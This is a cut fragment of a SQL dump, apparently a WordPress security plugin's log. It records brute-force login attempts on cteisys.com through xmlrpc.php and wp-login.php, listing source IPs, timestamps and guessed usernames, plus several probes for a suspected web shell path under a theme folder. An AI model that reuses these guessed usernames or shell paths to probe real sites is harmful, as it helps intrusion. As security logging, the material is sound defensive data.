0,0,0),('81.169.144.135',1370067079,'newd',0,1664440429.3926,152,'2QqnB9OMyuvlKbNaId8PifJE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('142.93.48.70',2388471878,'newd',0,1664440438.1176,152,'FYdw8f1oROQvhzeqJlP2jX6K','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('75.119.215.101',1266145125,'newd',0,1664440439.7950,152,'4wt32eGmPSrdA6FhxBVU1Ib7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('97.74.82.165',1632260773,'newd',0,1664440446.4892,152,'HUZ23K7sQzEOp6qX9IrtSckJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.194.10.231',1757547239,'newd',0,1664440792.2679,152,'Ybd1IlgK6qzJiEHtXUcjxOBT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.175.217.71',1118820679,'newd',0,1664441251.6402,152,'dCOXlWAyzp0DkEN8S2cmV4ot','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.244.246.140',3488937612,'newd',0,1664441343.9064,152,'x5dJu6HW2Rv7st3GZAmaL0kj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('172.105.49.155',2892575131,'newd',0,1664441346.4117,152,'ZWrJq2XadC7Aumky9Qnxl4Rp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.93.165.224',3109922272,'newd',0,1664441346.7291,152,'CeaW0gQtdKMifvk4Awr75GpF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.46.81.40',3324924200,'newd',0,1664441349.2134,152,'uRhdICJBXQoN5A4YVFPUvxqS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.68.47.69',3158585157,'newd',0,1664441351.0009,152,'vV81jHQoeBdwXI24bJZEqU7R','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.54.204',2160539340,'newd',0,1664441351.6496,152,'GDonKQbMz4vRfLC6V1lPSBdc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.180.138.212',1387563732,'newd',0,1664441353.2325,152,'SJoAlEHCDGhpgc3jif0O8sX2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('142.132.157.224',2391055840,'newd',0,1664441362.0208,152,'hWwdtmVlaeDFCJNTqXpSQ2sz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.21.77.74',3642051914,'newd',0,1664441366.2463,152,'lMa0i9tqyjGkmDr2hWoEKIw6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.126.36.87',226370647,'newd',0,1664441602.4209,152,'LH10utaP5MxC6AOoyhG8eq2v','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.148.118.130',3482613378,'newd',0,1664441727.1639,152,'CDeKGwUHqL7n2utzBfkE60FO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.244.77.192',1760841152,'nathaniel-lipka',0,1664441892.9136,51,'bD0xYJAdCSizWj8g9vNuk1PH','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.241.115.107',2733732715,'newd',0,1664442061.1767,152,'YcU0RtV17rg2pzL3Ny5ChDdF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.124.210.118',2994524790,'newd',0,1664442180.0066,152,'O9NZit4RKbJsm1awHPULrMq3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.233.192.83',1844035667,'newd',0,1664442557.7937,152,'eNqLFxkMlg3TIXoWZvdO42Au','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.183.122.143',3115809423,'newd',0,1664443036.4608,152,'IgRGFXjztU4loamH0sreLwDx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('39.106.15.209',661262289,'newd',0,1664443123.3557,152,'iyLBghdKqPaz8wV5k2r4sQlj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('62.102.148.156',1046910108,'joyce',0,1664443269.5174,152,'mdr1HDfUXtxkNT3bQRo4iC8s','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.75.223.219',3091980251,'joyce',0,1664443317.1591,152,'6ROCc0FrJxnSuYf48wq9GMeV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.91.83.187',861623227,'newd',0,1664443484.7482,152,'FY6m8ORdHZlW3nPoTArUheCx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('87.106.228.6',1466622982,'newd',0,1664444086.5024,152,'EDryCtfbGZOUWxnR36sei9S5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.104.66.61',795361853,'newd',0,1664444471.1444,152,'3ac9onrwzBWdpCSZOXquPi1G','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.49.240',3328324080,'Joyce',0,1664444547.4763,51,'cdKJxF29CUkvqueG0r1DS4hb','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('64.71.32.81',1078403153,'newd',0,1664444550.5851,152,'faZ9t6Nc2m3TiDuCIhJ0Ukwo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.68.150.77',1363449421,'newd',0,1664444553.0538,152,'tqZC7GjyTebRs0c5NMHYSWFz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.89.170.41',2673453609,'newd',0,1664444556.1167,152,'95oSOP38g624demzBWtkRlrv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('154.197.48.10',2596614154,'newd',0,1664444556.3535,152,'dkicwVqA4sem1bOv7KyMB6Ea','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('74.208.18.17',1255150097,'newd',0,1664444565.7227,152,'nMRovgJY79qpBD81AsGaKPVd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.25.23.57',3105429305,'newd',0,1664444566.8071,152,'JyLfT0V7vt9OGDbSr8oZRx2z','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('64.227.190.34',1088667170,'newd',0,1664444571.3006,152,'r3YbD0PpThBXSFfjQ4Zzvc2A','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.244.246.140',3488937612,'newd',0,1664444575.9660,152,'ATIR1SQDrK8psHL63ugPkvUw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.126.77.35',226381091,'newd',0,1664444583.5063,152,'LhmguvIqyc7TWZlB2FozUdrD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('203.156.136.113',3416033393,'newd',0,1664444586.3738,152,'OiABTurMPKkV6Ltdv9pqJ7Dc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.244.133.254',3270804990,'newd',0,1664444592.5281,152,'rQgzYuUCFH7JTqi1ybpceLBE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('154.197.48.10',2596614154,'newd',0,1664444601.3169,152,'wryloIG69aRS2KTNdeAu7gqU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.15.215',1152847831,'newd',0,1664444930.8902,152,'B2pvYUCrNkMiuXoQGbIs4Ltf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('180.149.241.246',3029725686,'newd',0,1664445027.5641,152,'xXe7mqw8UpOLdAogEFVsyDQu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.20.111',2335904879,'newd',0,1664445419.8323,152,'svaw6ObUJtL4V5NWQ973zRjD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.126.36.87',226370647,'newd',0,1664445527.3167,152,'c8wz3ZjUfnNyCoJma6QD259X','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.240.211.236',2733691884,'newd',0,1664445926.1891,152,'fzD3RTpFZP6HC8hyjMkV1l5n','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.196.152.3',2344916995,'newd',0,1664446534.7485,152,'9hDdAfP4L8FuvlaNTX1UjGeZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('118.27.125.16',1981512976,'newd',0,1664446548.3011,152,'lQxnPwZiFKfUbotLke25DM9H','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('220.85.221.65',3696614721,'newd',0,1664446550.0744,152,'OhimdR7TeDW1Y39JM26USnoI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('89.46.107.98',1496214370,'newd',0,1664446555.5015,152,'0KeO15pAmIRqJP4ftw2oTWFN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('89.46.107.98',1496214370,'newd',0,1664446576.1100,152,'IqoACXGPz6UMlYFRjuBn0K1c','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.127.106.229',2155834085,'newd',0,1664446581.3503,152,'rlo4dv1yp8zshgeI2tAE5jGP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.64.60.246',222313718,'newd',0,1664446586.9482,152,'CzEg9xGN1oTwUP3d7vu0DHYq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('123.56.5.185',2067269049,'newd',0,1664446588.5179,152,'9V4uiOLUBwK2DRtyCJ3nIh0S','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.107.113.160',3110826400,'newd',0,1664446603.1455,152,'rgWcx5aMotj2YpmSNLAdz70D','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.26.89',1152850521,'newd',0,1664446603.1490,152,'jBbfESW3xRnG50iyJowXF27U','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.54.204',2160539340,'newd',0,1664446603.1913,152,'X4LK7zCHmskJGyhpD1S23w5u','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('118.98.64.188',1986150588,'newd',0,1664446916.8727,152,'AKeybcfNi3RUTv0kBXlJQPgM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('195.206.105.203',3285084619,'joyce',0,1664447011.5760,152,'qIg8ZXO5uJr2LwyFEtCQosPU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('111.90.145.188',1868206524,'newd',0,1664447432.2004,152,'bSIq8csWFKUjQBMV4X6NCat3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('101.99.3.20',1700987668,'newd',0,1664447543.7506,152,'MqTcGVmKgUbd9iLZRWSv217t','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('119.8.58.8',1997027848,'newd',0,1664447543.7527,152,'yfITRc8qnph73xjZa5oNtsuC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('95.217.226.51',1608114739,'newd',0,1664447543.7952,152,'Srq1w54hTlagKC6bXiF0OsBc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('118.27.125.16',1981512976,'newd',0,1664447549.9535,152,'Kx3DvzGwm4MyWgR9l1jQnPIZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.109.68.254',3496822014,'newd',0,1664447558.7171,152,'HMvVD3QwcGuqy517jaT9ipmJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.128.2.114',2994733682,'newd',0,1664447559.2168,152,'e9mEqySPTYwAtUDJzRV8oGXZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('202.74.239.117',3393908597,'newd',0,1664447574.9103,152,'CAgYGuLJ71tqEaIW942DpH6O','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.163.138.21',1738770965,'newd',0,1664447586.9293,152,'GABjLP081TgEHb4DIYQFZwrf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.20.231.167',2987714471,'newd',0,1664447591.8844,152,'AvDhBkK48Ce9cP2uNSoUrqfs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('203.156.136.113',3416033393,'newd',0,1664447603.1941,152,'WnKB9IVdy276szmtHQ1MfJpc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('120.79.8.125',2018445437,'newd',0,1664447929.7189,152,'MpIi9LQr5aZw6s4RhbFqWuem','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.15.160.148',856662164,'newd',0,1664448058.0047,152,'NEBtOk2vn0TA4sdoPUb6rV7q','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.189.3.40',1807549224,'nathaniel-lipka',0,1664448366.6134,51,'4Yo1rkTVdRgbPcHSUpy9uDQ5','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('171.244.21.74',2884900170,'newd',0,1664448426.4860,152,'ADcYCPFzeEoOGpwtBn3WfJs4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.166.211.48',3165049648,'newd',0,1664448555.3023,152,'L5N2r3tXDGgWPBUZQJSMEkeo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.167.51.34',1218917154,'newd',0,1664448947.4827,152,'ZLwxiUeGVPamkp4zMjOQKb8l','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.131.189.63',1753464127,'newd',0,1664449468.2056,152,'Bpn3A1ey7LmTutZjYbaIGO2H','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.50.216',3328324312,'newd',0,1664449495.4786,7,'HsWyknb8MtSNq1cE7Of0QIFJ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('151.106.35.235',2540315627,'newd',0,1664449570.8770,152,'IAcky03M5ObV6rtLWzq91uZP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.90.232.106',1734010986,'newd',0,1664449951.3781,152,'MPRNBsKHeSU0rLxcGw5TazXA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.9.145.140',1208586636,'newd',0,1664450074.2633,152,'2QjWIJyPkp7vlLYFqgSXKUCZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('130.61.143.194',2185072578,'newd',0,1664450487.7918,152,'o9LVs1DSvGfuHOYtmEh2RBgI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.109.68.254',3496822014,'newd',0,1664450978.1396,152,'0AjgV6zZ4DQvqhtaPykom2np','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('38.242.205.84',653446484,'newd',0,1664450978.1491,152,'Db1tpV3saGIzBrZ76fPWhveL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.20.231.167',2987714471,'newd',0,1664450978.1841,152,'tv8QdAsO91PumiFkyqUolzMK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('222.124.3.203',3732669387,'newd',0,1664450981.7983,152,'OBKrwEIFjxlA3YfuiSVGa0MR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.195.166',2160575398,'newd',0,1664450987.2762,152,'kp4RLe8gBhM0mV7X3i5Csfz1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('201.236.28.16',3387694096,'newd',0,1664450990.8612,152,'QS3v4O2DdI5LgJpjc6CVNfAq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.252.18.29',788271645,'newd',0,1664450998.8976,152,'a8rU56ZtAfcXIDpJoEPxwCmB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.46.81.40',3324924200,'newd',0,1664451002.6999,152,'5zI72AmkBrSCXWpYb3uNxFQf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.128.2.114',2994733682,'newd',0,1664451014.6301,152,'8A2Xrgszu6jlBKL4DoayptCH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.102.88.47',3110492207,'newd',0,1664451014.6458,152,'WaUwEsxoLM5IVbj0Agz6c1mt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('23.88.4.230',391644390,'newd',0,1664451052.1450,152,'Qd6AewUuKisxICGRHotXSJbm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('31.172.80.147',531386515,'newd',0,1664451096.4778,152,'YkiJnAELNDI5gQtoFUjye76r','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('114.132.201.19',1921304851,'newd',0,1664451611.0740,152,'DdbyRFCUV3hEX1o8MvwSKBZI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.87.239.76',3512201036,'newd',0,1664452017.1748,152,'5Zezrxb8i0QKEFOT1ukpVoa4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.144.49.214',2727358934,'newd',0,1664452143.3634,152,'6zg4aRToL0B8wZqupKikdJQ9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('205.185.124.182',3451485366,'newd',0,1664452313.2585,7,'4FQRxWcYh9umvbqPAUXdMp7T','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('207.244.239.41',3488935721,'newd',0,1664452519.9637,152,'2KQO87i3obFDmCUEHRdepIkV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.126.219.43',3112098603,'newd',0,1664452660.4534,152,'JRB7CnYWEz6fxHc5gS4ILbK9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.249.124.141',3237575821,'newd',0,1664452941.7341,152,'TyZUYszMdre31hqO0cAN8wS5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.106.207.43',795529003,'newd',0,1664452951.1300,152,'uv8OKpE49LgzPHd5cBlWnoRf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('89.46.106.142',1496214158,'newd',0,1664452951.4283,152,'dV2rlWxbTGukinXOKCYAD3qZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.109.68.254',3496822014,'newd',0,1664452964.2064,152,'7NS5b1st8zCQYymglcj2r4JV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('14.225.3.211',249627603,'newd',0,1664452964.4031,152,'Wycinz9QE1baVxeJkP0fjDNT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.111.130.128',795837056,'newd',0,1664452980.8694,152,'DXy3JMYol9OKFhxH1LU8f7rz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.68.47.69',3158585157,'newd',0,1664452987.2326,152,'srGjzFVvLWMpCQUHtKARSihI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.204.239.12',1556934412,'newd',0,1664452987.6874,152,'6PpIVASwXQsx5FRMeo9mjvEf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('40.127.0.239',679411951,'newd',0,1664452998.3663,152,'23bB5vcgnSuUDk7OCLdhyMY6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.244.133.254',3270804990,'newd',0,1664453011.8199,152,'E91M2VJIvngD5LGfAhZCFla8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('39.107.137.177',661359025,'newd',0,1664453045.8698,152,'R6Ob5mhlNaxdtFiC17vB4KqJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.87.239.76',3512201036,'newd',0,1664453161.2789,152,'edqNgJ30IjMhiwKTQr5akFPz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.101.157.25',90545433,'newd',0,1664453574.3739,152,'jSWNBoZJvmD0HAEu6zdibs9U','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.210.196.65',3235038273,'newd',0,1664453696.7546,152,'NFWlfbLj248UmydKXItcMHBJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.68.150.77',1363449421,'newd',0,1664454008.7184,152,'W3VfRxute14CDgEIpk6s7HqA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('212.146.128.154',3566370970,'newd',0,1664454014.2080,152,'IB9rakoSynleHAduVUPsqwR8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('201.236.28.16',3387694096,'newd',0,1664454022.4815,152,'hs4NRizfAltZCP8cFETDg26m','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('50.62.177.214',842969558,'newd',0,1664454041.7388,152,'wUi0TQbSEgu2nZDpfBW67OdC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('168.138.1.42',2827616554,'newd',0,1664454047.4444,152,'OGzIL35SQRXBu29imhyorcwJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.149.77.114',764759410,'newd',0,1664454208.8758,152,'Cprw0tTOKvGm1huf3g7jDAyb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('89.46.107.98',1496214370,'newd',0,1664454365.2414,152,'3y2YXJbRtv1eEQLMgNczDW07','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('168.90.176.14',2824515598,'newd',0,1664454366.1138,152,'FmxXB1JgevshKEPf97UuLn6S','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.53.33',1364735265,'newd',0,1664454367.3076,152,'DMNusyv78Thc34SmoJ5e2ROq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('64.207.178.246',1087353590,'newd',0,1664454368.0469,152,'4pEHnYOSo5UeNLfV7kr0zMxC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('37.251.155.62',637246270,'newd',0,1664454371.9804,152,'cTrljsA7RH3mFXEp4YvoIOyN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('101.99.3.20',1700987668,'newd',0,1664454375.0476,152,'5yUdj2C903H6Tz1YfFB8il4Q','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.117.212.32',1735775264,'newd',0,1664454377.8339,152,'cwVjOpBiJ3zXUdSkTsuAH0Io','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.121.88.59',1736005691,'newd',0,1664454383.9095,152,'UOEpzNu3tjC0nT1YQxhI8a6H','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.99.206.99',2808335971,'newd',0,1664454384.7453,152,'YwmsacHQrBiWTFqCp6fz4ZxR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('52.179.81.192',884167104,'newd',0,1664454387.6245,152,'iMfHQgDaWvPs5TrzKedn78yw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.239.172.7',3002051591,'newd',0,1664454390.5708,152,'gVbpGOljaikKI45W3PSQ1UHh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.180.157.5',2343869701,'newd',0,1664454767.6043,152,'N4LgbfY2MBlzEiaqVOKuZe3T','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('88.135.37.49',1485251889,'wadminw',0,1664455510.5326,51,'BmF8jOrdnDwf2gpVRIyKtaYq','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('194.233.69.10',3270067466,'wadminw',0,1664455675.6246,51,'D6siOTuMLh0rxGtFaNmb2nRS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('111.90.150.36',1868207652,'wwwadmin',0,1664456428.2280,51,'qVTf5Xr3S6iWznEtwCLlQ0hx','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('111.90.150.28',1868207644,'wwwadmin',0,1664456672.8388,51,'odlG4OUqBR5YPAyEr1JzVWib','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('104.254.90.203',1761499851,'joyce',0,1664457086.9125,152,'R4iXkLfAGnMhzg1wVFSvorj6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.180.157.5',2343869701,'wadminw',0,1664457168.7931,152,'jLmrXbZi2qMuwCFTphVWUON9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('216.137.180.105',3632903273,'wadminw',0,1664457292.4146,152,'DSJzdmPAjVp4I3WhbCgOB58L','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('201.236.28.16',3387694096,'newd',0,1664457503.9033,152,'EBOaD09wlJSc4HqmXndVkUsW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.147.151',2160563095,'newd',0,1664457509.2162,152,'Mkj1KBmStcx3Hs26IaXOP8Ue','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.44.60.148',2905357460,'newd',0,1664457512.8230,152,'qr3ThFZdHEgyxzPNoCD9jOk7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('23.94.61.21',392051989,'newd',0,1664457522.8958,152,'56NXz02nUbCcHltWaeVr4sPQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('142.93.36.53',2388468789,'newd',0,1664457540.4439,152,'RPzHd62f7KVG4hp5SXLUTjI3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('61.19.125.142',1024687502,'newd',0,1664457542.4468,152,'unWK79PHbV0qeY25TGzsaov6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('150.95.112.79',2522837071,'wwwadmin',0,1664457712.1433,152,'Kl0Qwnkc5CUrDORJ38tYMTPu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.79.144.41',860852265,'wwwadmin',0,1664457849.4399,152,'c1PJifGzmTav9lCDrk6nFK2g','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.109.17.221',342692317,'',0,1664458128.5991,55,'Tdl9DU4M3HhWLE8uIy2meQNf','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/mar.php',0,19,0),('20.109.17.221',342692317,'',0,1664458132.8012,55,'oHiQVFdUgN7OBDsAraqLn8Kv','','19|0|0|0|cteisys.com/wp/wp-content/themes/seotheme/mar.php',0,19,0),('20.109.17.221',342692317,'',0,1664458136.5785,55,'U2OEPWFTyjuoRzV5bQfq6G8K','','19|0|0|0|cteisys.com/wordpress/wp-content/themes/seotheme/mar.php',0,19,0),('20.109.17.221',342692317,'',0,1664458140.0294,55,'usUqw654vM98Hk2VbyLhElxN','','19|0|0|0|cteisys.com/blog/wp-content/themes/seotheme/mar.php',0,19,0),('20.109.17.221',342692317,'',0,1664458154.9376,55,'QdUEioVvSWLp0bmljAzOXqc2','','19|0|0|0|cteisys.com/site/wp-content/themes/seotheme/mar.php',0,19,0),('20.109.17.221',342692317,'',0,1664458154.9410,10,'QdUEioVvSWLp0bmljAzOXqc2','','707|0|0|0|cteisys.com/site/wp-content/themes/seotheme/mar.php',0,707,0),('148.72.214.59',2487801403,'wadminw',0,1664458357.2105,152,'RmhX14SPIiK5wDg8ZzVkBJdl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.101.157.241',90545649,'wadminw',0,1664458503.1352,152,'peXlR5G3KVEaqDA2LdvC6UnW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.195.166',2160575398,'newd',0,1664459298.6554,152,'p0niZNRxwmbPaLBW3XM9fcj4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('116.202.117.198',1959425478,'newd',0,1664459298.6876,152,'7Xqk8FJ5p6ZmhyfDQgHORINc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('116.202.117.198',1959425478,'newd',0,1664459301.0824,152,'JM1Of06A5zBmVo3eGbd8KkaS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.0.220.27',2717965339,'newd',0,1664459302.4826,152,'JQFD4ncorepsMlPGOxAitb5y','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('201.236.28.16',3387694096,'newd',0,1664459312.1905,152,'cYH92lnxwMoLheUObGQm4qz1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.63.27.156',759110556,'newd',0,1664459316.8849,152,'pdc0C2YABx6NnQKRIOh7wFml','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('101.99.3.20',1700987668,'newd',0,1664459322.5896,152,'ATUR2os6vzhBb7Syd50nJKCa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.244.133.254',3270804990,'newd',0,1664459333.6023,152,'fBKla0nUhJjNyT9VDp1Q6P7E','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.147.151',2160563095,'newd',0,1664459334.3123,152,'tQbYNG6kV5BTD3Pfavzn7ZuS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('3.111.174.159',57650847,'newd',0,1664459340.7503,152,'tVmTjQxr4zGEb5CwOH308f2K','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('147.139.178.177',2475406001,'admin',0,1664460088.7520,152,'TFmBL8WsDKr1dPuZYGjiOz7J','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('142.93.48.70',2388471878,'newd',0,1664460239.6041,152,'AH5uFjscSZ1hgWxq3fXmNMBa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.233.89.214',3270072790,'admin',0,1664460239.6128,152,'kpmv5B8oDRJOfzTMFqVUjesZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('118.27.125.16',1981512976,'newd',0,1664460240.9080,152,'GtavzFRfTDrh3d9nmKp4olSW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.249.124.141',3237575821,'newd',0,1664460244.3160,152,'pOU3YBzPi8xqWyowrA9gdlbs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.33.205.144',1109511568,'newd',0,1664460246.9211,152,'VA7IEK5S92kbnRadl4vsLzMC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.91.106.237',576416493,'newd',0,1664460247.6736,152,'3xPv2fJNSa8UCLZtw4HlkmsR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.53.33',1364735265,'newd',0,1664460253.3656,152,'ZFWsCfEk4UlnjXrbzu0O1QxD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('142.93.48.70',2388471878,'newd',0,1664460269.6330,152,'IAVkSqlLZoiBEhngObewt31X','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.